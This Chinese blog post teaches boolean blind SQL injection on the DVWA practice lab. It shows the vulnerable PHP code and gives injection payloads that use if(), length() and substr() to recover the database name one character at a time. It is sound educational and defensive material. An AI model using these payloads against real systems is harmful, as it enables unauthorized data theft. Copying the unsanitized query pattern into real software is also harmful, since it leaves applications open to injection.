sql盲注

在一些特定的场景下我们输入的sql语句并没能回显出来只能根据不同的页面返回结果来判断结果,这就是盲注入

代码分析


<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

这里直接将id值拼接到了sql语句但是只是根据是否有返回结果来输出语句,有数据的情况下输出User ID exists in the database,没有的话输出
User ID is MISSING from the database.这里就没办法使用union联合查询了只能能通过布尔盲注

通过if函数来判断数据库名的长度
if (length(database())=4,1,0)
如果数据库的长度为4返回1,不是返回0

1’and (if (length(database())=4,1,0))####
页面返回User ID exists in the database说明数据名的长度确实为4
在这里插入图片描述
1’and (if (length(database())=3,1,0))####
在这里插入图片描述
通过substr函数截取字符串的长度
1’ and (select(substr(database() from 1 for 1))) = ‘d’###
这里from 1 for 1是从第一位开始截取一位字符串并且判断是否为字符串d
1’ and (select(substr(database() from 2 for 1))) = ‘v’###这里from 1 for 1是从第一位开始截取二位字符串并且判断是否为字符串v
最后得出库名为dvwa

参考文章
https://blog.csdn.net/weixin_45146120/article/details/100104131

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值